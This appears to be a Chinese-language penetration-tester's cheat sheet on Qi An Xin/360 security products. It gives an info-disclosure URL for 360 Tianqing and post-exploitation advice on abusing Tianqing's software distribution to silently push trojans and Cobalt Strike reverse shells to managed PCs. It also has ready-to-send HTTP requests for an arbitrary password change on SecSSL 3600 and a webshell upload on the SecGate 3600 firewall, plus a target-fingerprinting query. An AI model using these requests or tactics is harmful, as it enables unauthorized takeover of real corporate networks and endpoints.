奇安信&360

目录

• 天擎
  • 漏洞库
    • 360 新天擎终端安全管理系统信息泄露漏洞
  • 后渗透
    • 天擎控制客户机
• 网神
  • hunter
  • 网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞
  • 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
  • 网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞

天擎

终端安全管理，可以同时管理多台主机

漏洞库

360 新天擎终端安全管理系统信息泄露漏洞

http://ip:port/runtime/admin_log_conf.cache

后渗透

天擎控制客户机

1.自带的远程桌面控制，但是这个功能可能被管理员隐藏了找不到，即使能用这个功能，也可能出现因为不知道机器密码，停留在锁屏。

2.使用软件分发功能传马

如果机器出网，直接上cs反弹马。

如果机器不出网，但是开了3389 、445、135等端口。我们可以传添加用户的exe过去，再登录445或则3389。

如果机器不出网，且没有开发任何端口，例如pc办公机器（天擎客户机很多这种情况）。

可做正向或者反向马连接

终端管理-软件管理-软件分发，上传exe，然后分发即可。
分发注意关闭提示，可以设置启动参数

网神

hunter

网神secgate

app.name="网神 SecGate"

网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞

POC

POST /changepass.php?type=2

Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}

old_pass=&password=Test123!@&repassword=Test123!@

网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞

POST /?g=obj_app_upfile HTTP/1.1

Host: x.x.x.x

Accept: */*

Accept-Encoding: gzip, deflate

Content-Length: 574

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

------WebKitFormBoundaryJpMyThWnAxbcBBQc

Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000

------WebKitFormBoundaryJpMyThWnAxbcBBQc

Content-Disposition: form-data; name="upfile"; filename="vulntest.php"

Content-Type: text/plain

<?php php马?>

------WebKitFormBoundaryJpMyThWnAxbcBBQc

Content-Disposition: form-data; name="submit_post"

obj_app_upfile

------WebKitFormBoundaryJpMyThWnAxbcBBQc

Content-Disposition: form-data; name="**hash**"

0b9d6b1ab7479ab69d9f71b05e0e9445

------WebKitFormBoundaryJpMyThWnAxbcBBQc--

马儿路径：attachements/xxx.php

网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞

POST /changepass.php?type=2 

Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}
old_pass=&password=Test123!@&repassword=Test123!@